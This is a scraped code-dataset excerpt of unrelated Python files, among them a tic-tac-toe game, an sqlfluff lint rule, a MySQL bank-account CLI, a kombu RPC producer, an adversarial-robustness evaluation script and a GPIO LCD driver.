sqr.penup()\n sqr.forward(separate)\n\n input('Press enter to end.') # keeps the turtle graphics window open\n\nif __name__ == '__main__':\n main()\n","sub_path":"hw/2/polygons.py","file_name":"polygons.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"64206955","text":"from game_config.game import GameConfig\nfrom game_state.influence_tracks import InfluenceTracksStates\nfrom game_state.map import MapState\nfrom game_state.player import PlayerState\n\n\nclass GameState(object):\n def __init__(self, game_config: GameConfig):\n self.map_state = MapState(game_config.game_map)\n self.influence_state = InfluenceTracksStates(game_config.influence_tracks)\n self.player_states = []\n for player_config in game_config.players:\n player_state = PlayerState(game_config, player_config, self.map_state)\n self.player_states.append(player_state)\n\n self.round_number = 1\n\n def get_player(self, name: str) -> PlayerState:\n for player in self.player_states:\n if player.player_config.name == name:\n return player\n raise KeyError(f\"No player state with name {name}\")\n","sub_path":"game_state/game_state.py","file_name":"game_state.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394310382","text":"\"\"\"Implementation of Rule L035.\"\"\"\n\nfrom sqlfluff.core.rules.base import BaseRule, LintFix, LintResult\nfrom sqlfluff.core.rules.doc_decorators import document_fix_compatible\n\n\n@document_fix_compatible\nclass Rule_L035(BaseRule):\n \"\"\"Do not specify \"else null\" in a case when statement (redundant).\n\n | **Anti-pattern**\n\n .. code-block:: sql\n\n select\n case\n when name like '%cat%' then 'meow'\n when name like '%dog%' then 'woof'\n else null\n end\n from x\n\n | **Best practice**\n | Omit \"else null\"\n\n .. 
code-block:: sql\n\n select\n case\n when name like '%cat%' then 'meow'\n when name like '%dog%' then 'woof'\n end\n from x\n \"\"\"\n\n def _eval(self, segment, **kwargs):\n \"\"\"Find rule violations and provide fixes.\n\n 0. Look for a case expression\n 1. Look for \"ELSE\"\n 2. Mark \"ELSE\" for deletion (populate \"fixes\")\n 3. Backtrack and mark all newlines/whitespaces for deletion\n 4. Look for a raw \"NULL\" segment\n 5.a. The raw \"NULL\" segment is found, we mark it for deletion and return\n 5.b. We reach the end of case when without matching \"NULL\": the rule passes\n \"\"\"\n if segment.is_type(\"case_expression\"):\n fixes = []\n for idx, seg in enumerate(segment.segments):\n # When we find ELSE we delete\n # everything up to NULL\n if fixes:\n fixes.append(LintFix(\"delete\", seg))\n # Safe to look for NULL, as an expression\n # would contain NULL but not be == NULL\n if seg.raw_upper == \"NULL\":\n return LintResult(anchor=segment, fixes=fixes)\n\n if not fixes and seg.name == \"else\":\n fixes.append(LintFix(\"delete\", seg))\n # Walk back to remove indents/whitespaces\n walk_idx = idx - 1\n while (\n segment.segments[walk_idx].name == \"whitespace\"\n or segment.segments[walk_idx].name == \"newline\"\n or segment.segments[walk_idx].is_meta\n ):\n fixes.append(LintFix(\"delete\", segment.segments[walk_idx]))\n walk_idx = walk_idx - 1\n","sub_path":"src/sqlfluff/rules/L035.py","file_name":"L035.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"278916559","text":"from tpge import *\r\n\r\nMAX_TURNS = 10\r\nNUM_OF_TURNS = 0\r\nWHOSE_TURN = 'null'\r\nCell = 'null'\r\nTOP_LEFT = 0\r\nTOP_MIDDLE = 1\r\nTOP_RIGHT = 2\r\nMIDDLE_LEFT = 3\r\nMIDDLE_MIDDLE = 4\r\nMIDDLE_RIGHT = 5\r\nBOTTOM_LEFT = 6\r\nBOTTOM_MIDDLE = 7\r\nBOTTOM_RIGHT = 8\r\n\r\ndef initial_state():\r\n \"\"\"\r\n initial_state : State\r\n Returns the initial state of the game which is the 
list \r\n [[X cells], [O cells]].\r\n \"\"\"\r\n return [[],[]]\r\n\r\ndef successor_state(S, P):\r\n \"\"\"\r\n successor_state : State x Point -> State\r\n If S is a state and P is a Point, then successor_state(S,P) is the State\r\n obtained by clicking on P in S.\r\n \"\"\"\r\n\r\n TURN = NUM_OF_TURNS\r\n Cell = 'null'\r\n \r\n if in_top_left_cell(P):\r\n Cell = TOP_LEFT\r\n elif in_top_middle_cell(P):\r\n Cell = TOP_MIDDLE\r\n elif in_top_right_cell(P):\r\n Cell = TOP_RIGHT\r\n elif in_middle_left_cell(P):\r\n Cell = MIDDLE_LEFT\r\n elif in_middle_middle_cell(P):\r\n Cell = MIDDLE_MIDDLE\r\n elif in_middle_right_cell(P):\r\n Cell = MIDDLE_RIGHT\r\n elif in_bottom_left_cell(P):\r\n Cell = BOTTOM_LEFT\r\n elif in_bottom_middle_cell(P):\r\n Cell = BOTTOM_MIDDLE\r\n elif in_bottom_right_cell(P):\r\n Cell = BOTTOM_RIGHT\r\n\r\n if TURN % 2 == 0:\r\n S[0].append(Cell)\r\n else:\r\n S[1].append(Cell)\r\n\r\n TURN += TURN\r\n return S\r\n\r\ndef game_over(State):\r\n \"\"\"\r\n game_over : State -> Boolean\r\n If S is a State, then game_over(S) is True if and only if the maximum\r\n number of turns has been reached in S.\r\n \"\"\"\r\n return NUM_OF_TURNS == MAX_TURNS\r\n\r\ndef images(S):\r\n \"\"\"\r\n images : State -> Image List\r\n If S is a State, then images(S) is the list of Images that need to be\r\n drawn to the screen in order to present the state S to the user. 
For\r\n this game the images that need to be drawn are the background and\r\n the contents of the cells.\r\n \"\"\"\r\n return background() + contents(S)\r\n\r\ndef game_title():\r\n \"\"\"\r\n game_title : String\r\n Returns the name of the game which is \"TPGE DEMO\".\r\n \"\"\"\r\n return \"Tic Tac Toe\"\r\n\r\ndef background():\r\n \"\"\"\r\n background : Image List\r\n Returns the Image List needed to display the background for the game.\r\n \"\"\"\r\n LEFT_BORDER = (170, 400, 170, 100)\r\n MIDDLE_RIGHT_BORDER = (370, 400, 370, 100)\r\n MIDDLE_LEFT_BORDER = (270, 400, 270, 100)\r\n RIGHT_BORDER = (470, 400, 470, 100)\r\n TOP_BORDER = (170, 400, 470, 400)\r\n MIDDLE_TOP_BORDER = (170, 300, 470, 300)\r\n MIDDLE_BOTTOM_BORDER = (170, 200, 470, 200)\r\n BOTTOM_BORDER = (170, 100, 470, 100)\r\n return [LEFT_BORDER, MIDDLE_LEFT_BORDER, MIDDLE_RIGHT_BORDER, RIGHT_BORDER, TOP_BORDER, MIDDLE_TOP_BORDER, MIDDLE_BOTTOM_BORDER, BOTTOM_BORDER]\r\n\r\ndef contents(S):\r\n \"\"\"\r\n contents : State -> Image List\r\n If S is a state, then contents(S) is the list of Images needed to\r\n draw the contents of the cells in S.\r\n \"\"\"\r\n NUM_OF_TURNS = 0\r\n TURN = NUM_OF_TURNS\r\n TicTacToeContents = []\r\n if TURN % 2 == 0:\r\n WHOSE_TURN == 'X'\r\n TicTacToeContents.append([\"X's turn\",300,500,15])\r\n\r\n if Cell == TOP_LEFT:\r\n TicTacToeContents.append([170,400,270,300])\r\n TicTacToeContents.append([270,400,170,300])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == TOP_MIDDLE:\r\n TicTacToeContents.append([270,400,370,300])\r\n TicTacToeContents.append([370,400,270,300])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == TOP_RIGHT:\r\n TicTacToeContents.append([370,400,470,300])\r\n TicTacToeContents.append([470,400,370,300])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == MIDDLE_LEFT:\r\n TicTacToeContents.append([170,300,270,200])\r\n TicTacToeContents.append([270,300,170,200])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == MIDDLE_MIDDLE:\r\n 
TicTacToeContents.append([270,300,370,200])\r\n TicTacToeContents.append([370,300,270,200])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == MIDDLE_RIGHT:\r\n TicTacToeContents.append([370,300,470,200])\r\n TicTacToeContents.append([470,300,370,200])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == BOTTOM_LEFT:\r\n TicTacToeContents.append([170,200,270,100])\r\n TicTacToeContents.append([270,200,170,100])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == BOTTOM_MIDDLE:\r\n TicTacToeContents.append([270,200,370,100])\r\n TicTacToeContents.append([370,200,270,100])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == BOTTOM_RIGHT:\r\n TicTacToeContents.append([370,200,470,100])\r\n TicTacToeContents.append([470,200,370,100])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n \r\n elif TURN % 2 == 1:\r\n WHOSE_TURN == 'O'\r\n TicTacToeContents.append([\"O's turn\",300,500,15])\r\n\r\n if Cell == TOP_LEFT:\r\n TicTacToeContents.append([220,350,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == TOP_MIDDLE:\r\n TicTacToeContents.append([320,350,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == TOP_RIGHT:\r\n TicTacToeContents.append([420,350,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == MIDDLE_LEFT:\r\n TicTacToeContents.append([220,250,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == MIDDLE_MIDDLE:\r\n TicTacToeContents.append([320,250,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == MIDDLE_RIGHT:\r\n TicTacToeContents.append([420,250,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == BOTTOM_LEFT:\r\n TicTacToeContents.append([220,150,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == BOTTOM_MIDDLE:\r\n TicTacToeContents.append([320,150,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == BOTTOM_RIGHT: \r\n TicTacToeContents.append([420,150,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n\r\n print (TicTacToeContents)\r\n return TicTacToeContents\r\n\r\ndef in_top_left_cell(P):\r\n \"\"\"\r\n in_left_cell : Point -> Boolean\r\n If P is a point, then in_top_left_cell(P) is 
True if and only if P\r\n is within the top left cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 170 <= X <= 270 and 400 <= Y <= 300\r\n\r\ndef in_top_middle_cell(P):\r\n \"\"\"\r\n in_top_middle_cell : Point -> Boolean\r\n If P is a point, then in_top_middle_cell(P) is True if and only if P\r\n is within the top middle cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 270 <= X <= 370 and 400 <= Y <= 300\r\n\r\ndef in_top_right_cell(P):\r\n \"\"\"\r\n in_top_right_cell : Point -> Boolean\r\n If P is a point, then in_top_right_cell(P) is True if and only if P\r\n is within the top right cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 370 <= X <= 470 and 400 <= Y <= 300\r\n\r\ndef in_middle_left_cell(P):\r\n \"\"\"\r\n in_middle_left_cell : Point -> Boolean\r\n If P is a point, then in_middle_left_cell(P) is True if and only if P\r\n is within the middle left cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 170 <= X <= 270 and 300 <= Y <= 200\r\n\r\ndef in_middle_middle_cell(P):\r\n \"\"\"\r\n in_middle_middle_cell : Point -> Boolean\r\n If P is a point, then in_middle_middle_cell(P) is True if and only if P\r\n is within the center cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 270 <= X <= 370 and 300 <= Y <= 200\r\n\r\ndef in_middle_right_cell(P):\r\n \"\"\"\r\n in_middle_right_cell : Point -> Boolean\r\n If P is a point, then in_middle_right_cell(P) is True if and only if P\r\n is within the middle right cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 370 <= X <= 470 and 300 <= Y <= 200\r\n\r\ndef in_bottom_left_cell(P):\r\n \"\"\"\r\n in_bottom_left_cell : Point -> Boolean\r\n If P is a point, then in_bottom_left_cell(P) is True if and only if P\r\n is within the bottom left cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 170 <= X <= 270 and 200 <= Y <= 100\r\n\r\ndef in_bottom_middle_cell(P):\r\n \"\"\"\r\n in_bottom_middle_cell : Point -> Boolean\r\n If P is a point, then in_bottom_middle_cell(P) is True if and only if P\r\n is within the bottom middle cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 270 <= X 
<= 370 and 200 <= Y <= 100\r\n\r\ndef in_bottom_right_cell(P):\r\n \"\"\"\r\n in_bottom_right_cell : Point -> Boolean\r\n If P is a point, then in_bottom_right_cell(P) is True if and only if P\r\n is within the bottom right cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 370 <= X <= 470 and 200 <= Y <= 100\r\n\r\nif __name__ == \"__main__\":\r\n run_game(game_title, initial_state, successor_state, game_over, images)\r\n\r\n","sub_path":"Tic Tac Toe.py","file_name":"Tic Tac Toe.py","file_ext":"py","file_size_in_byte":8669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"335521605","text":"from __future__ import print_function\nimport sys\nfrom .deferred import Deferred\n\ndef encodeBinRaw(isBin, raw, link_address):\n\tif isBin:\n\t\theader = [\n\t\t\tlink_address & 0xFF,\n\t\t\tlink_address >> 8,\n\t\t\tlen(raw) & 0xFF,\n\t\t\tlen(raw) >> 8\n\t\t]\n\telse:\n\t\theader = []\n\n\tif sys.version_info[0] == 2:\n\t\t# Python 2\n\t\treturn \"\".join([chr(char) for char in header + raw])\n\telse:\n\t\t# Python 3\n\t\treturn bytes(header + raw)\n\n\ndef int8ToUint8(int8):\n\tif isinstance(int8, Deferred):\n\t\treturn Deferred.If(\n\t\t\tint8 < 0,\n\t\t\tint8 + 256,\n\t\t\tint8\n\t\t)\n\telse:\n\t\tif int8 < 0:\n\t\t\treturn int8 + 256\n\t\telse:\n\t\t\treturn int8\n\n\n\ndef octal(n):\n\t# Compatible with Python 2 and Python 3\n\treturn oct(int(n))[1:].replace(\"o\", \"\")\n\n\nerror_mode_sublime = False\n\ndef raiseSyntaxError(file, line, column, stack=[], error=None):\n\tif error_mode_sublime:\n\t\tprint(\"{file}:::{line}:::{column}:::{error}\".format(\n\t\t\tfile=file,\n\t\t\tline=line,\n\t\t\tcolumn=column,\n\t\t\terror=error\n\t\t))\n\telse:\n\t\tprint(\"Syntax error\")\n\t\tif error is not None:\n\t\t\tprint(error)\n\t\tprint(\" at file\", file, \"(line {line}, column {column})\".format(line=line, column=column))\n\t\tfor stage in stack:\n\t\t\tprint(\" at\", stage)\n\traise SystemExit(1)\n\ndef raiseCompilerError(text, 
coords):\n\tif error_mode_sublime:\n\t\tprint(\"{file}:::{line}:::{column}:::{error}\".format(\n\t\t\tfile=coords[\"file\"],\n\t\t\tline=coords[\"line\"],\n\t\t\tcolumn=coords[\"column\"],\n\t\t\terror=text\n\t\t))\n\telse:\n\t\tprint(text)\n\t\tprint(\" at file {file} (line {line}, column {column})\".format(\n\t\t\tfile=coords[\"file\"],\n\t\t\tline=coords[\"line\"],\n\t\t\tcolumn=coords[\"column\"]\n\t\t))\n\t\tprint()\n\t\tprint(coords[\"text\"])\n\traise SystemExit(1)\n\ndef raiseExpressionEvaluateError(file, line, column, text):\n\tif error_mode_sublime:\n\t\tprint(\"{file}:::{line}:::{column}:::{error}\".format(\n\t\t\tfile=file,\n\t\t\tline=line,\n\t\t\tcolumn=column,\n\t\t\terror=text\n\t\t))\n\telse:\n\t\tprint(text)\n\t\tprint(\" at file {file} (line {line}, column {column})\".format(\n\t\t\tfile=file,\n\t\t\tline=line,\n\t\t\tcolumn=column\n\t\t))\n\traise SystemExit(1)\n\ndef setErrorMode(sublime=True):\n\tglobal error_mode_sublime\n\terror_mode_sublime = sublime","sub_path":"compiler/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"278193745","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport argparse\nimport numpy as np\nfrom six.moves import cPickle\nimport random\nimport tensorflow as tf\nimport time\n\nfrom model import Model\n\n\ndef main():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument('--save_dir', type=str, default='save',\n help='model directory to store checkpointed models')\n parser.add_argument('--word', type=str, default=u'apfelbrothauskirche',\n help='word for splitting')\n parser.add_argument('--count', type=int, default=10,\n help='count of words for test')\n parser.add_argument('--device', type=str, default='/gpu:0',\n help='device')\n args = parser.parse_args()\n sample(args)\n\n\ndef sample(args):\n timer = 
time.time()\n with open(os.path.join(args.save_dir, 'config.pkl'), 'rb') as f:\n saved_args = cPickle.load(f)\n with open(os.path.join(args.save_dir, 'chars_vocab.pkl'), 'rb') as f:\n chars, vocab = cPickle.load(f)\n model = Model(saved_args, infer=True)\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n saver = tf.train.Saver(tf.global_variables())\n ckpt = tf.train.get_checkpoint_state(args.save_dir)\n if ckpt and ckpt.model_checkpoint_path:\n\n def same_prefix(splitted, real, prefix_len=3):\n for i in range(len(real)):\n try:\n if splitted[i][:prefix_len].lower() != real[i][:prefix_len].lower():\n return False\n except IndexError:\n return False\n return True\n\n saver.restore(sess, ckpt.model_checkpoint_path)\n k = 0\n COUNT = 20\n random.seed()\n randlist = []\n for i in range(args.count):\n # need to switch 66206 to sum(1 for line in f)\n randlist.append(random.randint(0, 66206))\n with open('data/compounds.txt', encoding='utf-8') as f:\n for i, line in enumerate(f):\n if i in randlist:\n words = line.split(' ')\n words[-1] = words[-1][:-1]\n # if not ' ' in words[0]:\n splitted = model.smash(sess, vocab, words[0].lower())\n print(splitted)\n print(words[1:])\n if same_prefix(splitted, words[1:]):\n k += 1\n print(k / args.count)\n\n print(time.time() - timer, 'seconds for test')\n\nif __name__ == '__main__':\n main()\n","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169135017","text":"import mysql.connector\r\nmydb = mysql.connector.connect(host='localhost',user='root',password='9975696628',database='BANK_MANAGEMENT')\r\n\r\ndef OpenAcc():\r\n n=input(\"Enter The Name: \")\r\n n=n.title()\r\n\r\n ac=input(\"Enter The Account No: \")\r\n db=input(\"Enter The Date of Birth: \")\r\n add=input(\"Enter The Address: \")\r\n # try:\r\n # cn=int(input(\"Enter The Contact Number: \"))\r\n # cn = 
str(cn)\r\n # except:\r\n # print(\"Contact number should be in digits\")\r\n # cn=input(\"Enter The Contact Number: \")\r\n cn=input(\"Enter The Contact Number: \")\r\n ob=int(input(\"Enter The Account Balance: \"))\r\n data1=(n,ac,db,add,cn,ob)\r\n data2=(n,ac,ob)\r\n sql1='insert into account values (%s,%s,%s,%s,%s,%s)' \r\n sql2='insert into amount values (%s,%s,%s)'\r\n x=mydb.cursor()\r\n x.execute(sql1,data1)\r\n x.execute(sql2,data2)\r\n mydb.commit()\r\n print(\"Data Entered Succesfully\")\r\n main()\r\n\r\ndef DespoAmo():\r\n amount= input(\"Enter the amount you want to deposit: \")\r\n ac=input(\"Enter The Account No: \")\r\n a = 'select balance from amount where Accno=%s'\r\n data=(ac,)\r\n x=mydb.cursor()\r\n x.execute(a% data)\r\n result=x.fetchone()\r\n t=result[0] + int(amount)\r\n sql=('update amount set Balance=%s where AccNo=%s')\r\n d=(t,ac)\r\n x.execute(sql, d) \r\n mydb.commit()\r\n main()\r\n\r\ndef WithdrawAmount():\r\n amount=input(\"Enter the amount you want to withdraw: \")\r\n ac = input(\"Enter The Account No: \")\r\n a='select balance from amount where Accno=%s'\r\n data=(ac,)\r\n x=mydb.cursor()\r\n x.execute(a%data)\r\n result=x.fetchone()\r\n t=result[0]-float(amount)\r\n sql=('update amount set balance=%s where Accno=%s')\r\n d=(t,ac)\r\n x.execute(sql%d) \r\n mydb.commit()\r\n main()\r\n\r\ndef BalEnq():\r\n ac=input(\"Enter the account No: \")\r\n a='select * from amount where Accno=%s'\r\n data=(ac,)\r\n x=mydb.cursor()\r\n x.execute(a%data)\r\n result=x.fetchone()\r\n print(\"balance for account:\",ac,\"is\",result[-1])\r\n\r\ndef DisDetails():\r\n ac=input(\"Enter the account No: \")\r\n a='select * from account where Accno=%s'\r\n data=(ac,)\r\n x=mydb.cursor()\r\n x.execute(a%data)\r\n result=x.fetchone()\r\n for i in result:\r\n print(i)\r\n main()\r\n\r\ndef CloseAcc():\r\n ac=input(\"Enter account no: \")\r\n sql1='delete from account where Accno=%s'\r\n sql2='delete from amount where Accno=%s'\r\n data=(ac,)\r\n 
x=mydb.cursor()\r\n x.execute(sql1%data)\r\n x.execute(sql2%data)\r\n mydb.commit()\r\n main()\r\n\r\n\r\n\r\n \r\ndef main():\r\n print(''' \r\n 1.OPEN NEW ACCOUNT\r\n 2.DEPOSIT AMOUNT\r\n 3.WITHDRAW AMOUNT\r\n 4.BALANCE ENQUIRY\r\n 5.DISPLAY CUSTOMER DETAILS\r\n 6.CLOSE AN ACCOUNT\r\n 7.CANCEL''')\r\nchoice = 0\r\nwhile(choice != '7'):\r\n choice = input(\"Enter the operation you want to perform : \")\r\n if (choice=='1'):\r\n OpenAcc() \r\n elif(choice=='2'):\r\n DespoAmo() \r\n elif(choice=='3'):\r\n WithdrawAmount() \r\n elif(choice=='4'):\r\n BalEnq()\r\n elif(choice=='5'):\r\n DisDetails()\r\n elif(choice=='6'):\r\n CloseAcc()\r\n else:\r\n print(\"Invalid Choice\")","sub_path":"bank management final.py","file_name":"bank management final.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"329244076","text":"from kombu import Connection, Producer, Queue, Consumer, Message\nfrom typing import Callable\n\n\nclass RPCProducer:\n \"\"\"\n This class will begin an RPC and process the received response\n \"\"\"\n\n def __init__(self, connection_string: str, routing: str, callback: Callable[[dict, Message], None] = None):\n from src.service.template.mq.mq import make_basic_exchange\n self.exchange = make_basic_exchange(\"rpc\")\n self.conn = Connection(connection_string)\n self.routing = routing\n self.callback = callback\n self.reply_queue = Queue(name=\"amq.rabbitmq.reply-to\")\n\n def call(self, payload: dict, ):\n with Consumer(self.conn, self.reply_queue, callbacks=[self.on_message], no_ack=True):\n producer = Producer(exchange=self.exchange, channel=self.conn, routing_key=self.routing)\n properties = {\n \"reply_to\": \"amq.rabbitmq.reply-to\",\n }\n producer.publish(payload, **properties)\n self.conn.drain_events()\n\n def on_message(self, body: dict, message: Message):\n callback_function = self.default_callback\n if self.callback is not None:\n 
callback_function = self.callback\n callback_function(body, message)\n message.ack()\n\n @staticmethod\n def default_callback(body, message: Message):\n print(\"RPC Response:\\n%s\" % body)\n","sub_path":"src/service/template/mq/rpc/rpc_producer.py","file_name":"rpc_producer.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"73850487","text":"#!./env python\n\n# from autoattack import AutoAttack\nimport torch\nimport numpy as np\nimport os\nimport argparse\n\nimport torchvision.datasets as datasets\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\n\nfrom src.adversary import AAAttacker\nfrom src.utils import get_net, str2bool\n\ndef robust_certify(model, depth, width, model_parallel=False, normalize=True,\n path='.', state='last', gpu_id='0', # sample=1000, seed=7,\n mode='standard',\n data_dir='/home/chengyu/RobustDataProfiling/data'):\n\n ## Current setting: evaluate on a random subset of 1000 (fixed during training)\n ## Fast setting for epoch-wise evaluation: same as above but use agpd-t only\n ## Leaderboard evalulation setting: n_ex=10000, i.e. 
use the entire testset\n\n # standard: all four attack, entire test set\n # fast: first two attack, entire test set\n assert(mode in ['standard', 'fast'])\n\n print('>>>>>>>>>>> set environment..')\n os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\n os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n print('>>>>>>>>>>> get net..')\n if state == 'last':\n model_state = 'model.pt'\n elif state == 'best':\n model_state = 'best_model.pt'\n else:\n raise KeyError(state)\n\n log_path = 'log_certify_%s' % state\n if mode != 'standard':\n log_path += '_%s' % mode\n log_path += '.txt'\n\n net = get_net(path,\n num_classes=10,\n n_channel=3,\n feature=None,\n model=model,\n depth=depth,\n width=width,\n state=model_state,\n parallel=model_parallel,\n device=device)\n\n print('>>>>>>>>>>> start evaluating..')\n attacker = AAAttacker(net=net,\n normalize=normalize,\n mode=mode,\n path=path,\n log_path=log_path,\n device=device,\n data_dir=data_dir)\n attacker.evaluate()\n\n print('>>>>>>>>>>> Done.')\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-m', \"--model\", default='resnet', type=str, help='model')\n parser.add_argument('--depth', default=20, type=int, help='model depth')\n parser.add_argument('--width', default=64, type=int, help='model width')\n parser.add_argument(\"-mp\", \"--model-parallel\", type=str2bool, nargs='?', const=True, default=False, help=\"model parallel?\")\n parser.add_argument(\"--norm\", type=str2bool, nargs='?', const=True, default=False, help=\"normalized inputs?\")\n parser.add_argument(\"-p\", \"--path\", type=str, help=\"model path\")\n parser.add_argument('-d', \"--state\", default='last', type=str, help='model state')\n parser.add_argument(\"-g\", \"--gpu\", default='0', type=str, help=\"gpu_id\")\n parser.add_argument(\"--mode\", default='standard', type=str, help=\"eval mode\")\n args = parser.parse_args()\n\n 
print(args.model_parallel)\n\n robust_certify(model=args.model, depth=args.depth, width=args.width, model_parallel=args.model_parallel, normalize=args.norm,\n path=args.path, state=args.state, gpu_id=args.gpu, mode=args.mode)\n","sub_path":"robustCertify.py","file_name":"robustCertify.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"333336183","text":"'''\npython-periphery 1602 LCD sample\n\nI ported from here\nhttps://www.raspberrypi-spy.co.uk/2012/07/16x2-lcd-module-control-using-python/\n\n'''\n#!/usr/bin/python\n#-*- encoding: utf-8 -*-\n#import\nfrom periphery import GPIO\nimport time\n\n# Define GPIO to LCD mapping\nGPIO.LCD_RS = GPIO(101, \"out\")\nGPIO.LCD_E = GPIO(121, \"out\")\nGPIO.LCD_D4 = GPIO(122, \"out\")\nGPIO.LCD_D5 = GPIO(123, \"out\")\nGPIO.LCD_D6 = GPIO(124, \"out\")\nGPIO.LCD_D7 = GPIO(125, \"out\")\n\n# Define some device constants\nLCD_WIDTH = 16 # Maximum characters per line\nLCD_CHR = True\nLCD_CMD = False\n\nLCD_LINE_1 = 0x80 # LCD RAM address for the 1st line\nLCD_LINE_2 = 0xC0 # LCD RAM address for the 2nd line\n\n# Timing constants\nE_PULSE = 0.0005\nE_DELAY = 0.0005\n\ndef main():\n # Main program block\n# GPIO_setwarnings(False)\n# GPIO_setmode(GPIO_BCM) # Use BCM GPIO numbers\n# GPIO_setup(LCD_E, GPIO_OUT) # E\n# GPIO_setup(LCD_RS, GPIO_OUT) # RS\n# GPIO_setup(LCD_D4, GPIO_OUT) # DB4\n# GPIO_setup(LCD_D5, GPIO_OUT) # DB5\n# GPIO_setup(LCD_D6, GPIO_OUT) # DB6\n# GPIO_setup(LCD_D7, GPIO_OUT) # DB7\n\n # Initialise display\n lcd_init()\n\n while True:\n\n # Send some test\n lcd_string(\"OrangePi 2G-IOT\",LCD_LINE_1)\n lcd_string(\"16x2 LCD Test\",LCD_LINE_2)\n\n time.sleep(3) # 3 second delay\n\n # Send some text\n lcd_string(\"1234567890123456\",LCD_LINE_1)\n lcd_string(\"abcdefghijklmnop\",LCD_LINE_2)\n\n time.sleep(3) # 3 second delay\n\ndef lcd_init():\n # Initialise display\n lcd_byte(0x33,LCD_CMD) # 110011 Initialise\n 
lcd_byte(0x32,LCD_CMD) # 110010 Initialise\n lcd_byte(0x06,LCD_CMD) # 000110 Cursor move direction\n lcd_byte(0x0C,LCD_CMD) # 001100 Display On,Cursor Off, Blink Off\n lcd_byte(0x28,LCD_CMD) # 101000 Data length, number of lines, font size\n lcd_byte(0x01,LCD_CMD) # 000001 Clear display\n time.sleep(E_DELAY)\n\ndef lcd_byte(bits, mode):\n # Send byte to data pins\n # bits = data\n # mode = True for character\n # False for command\n\n GPIO.LCD_RS.write(mode) # RS\n\n # High bits\n GPIO.LCD_D4.write(False)\n GPIO.LCD_D5.write(False)\n GPIO.LCD_D6.write(False)\n GPIO.LCD_D7.write(False)\n if bits&0x10==0x10:\n GPIO.LCD_D4.write(True)\n if bits&0x20==0x20:\n GPIO.LCD_D5.write(True)\n if bits&0x40==0x40:\n GPIO.LCD_D6.write(True)\n if bits&0x80==0x80:\n GPIO.LCD_D7.write(True)\n\n # Toggle 'Enable' pin\n lcd_toggle_enable()\n\n # Low bits\n GPIO.LCD_D4.write(False)\n GPIO.LCD_D5.write(False)\n GPIO.LCD_D6.write(False)\n GPIO.LCD_D7.write(False)\n if bits&0x01==0x01:\n GPIO.LCD_D4.write(True)\n if bits&0x02==0x02:\n GPIO.LCD_D5.write(True)\n if bits&0x04==0x04:\n GPIO.LCD_D6.write(True)\n if bits&0x08==0x08:\n GPIO.LCD_D7.write(True)\n\n # Toggle 'Enable' pin\n lcd_toggle_enable()\n\ndef lcd_toggle_enable():\n # Toggle enable\n time.sleep(E_DELAY)\n GPIO.LCD_E.write(True)\n time.sleep(E_PULSE)\n GPIO.LCD_E.write(False)\n time.sleep(E_DELAY)\n\ndef lcd_string(message,line):\n # Send string to display\n\n message = message.ljust(LCD_WIDTH,\" \")\n\n lcd_byte(line, LCD_CMD)\n\n for i in range(LCD_WIDTH):\n lcd_byte(ord(message[i]),LCD_CHR)\n\nif 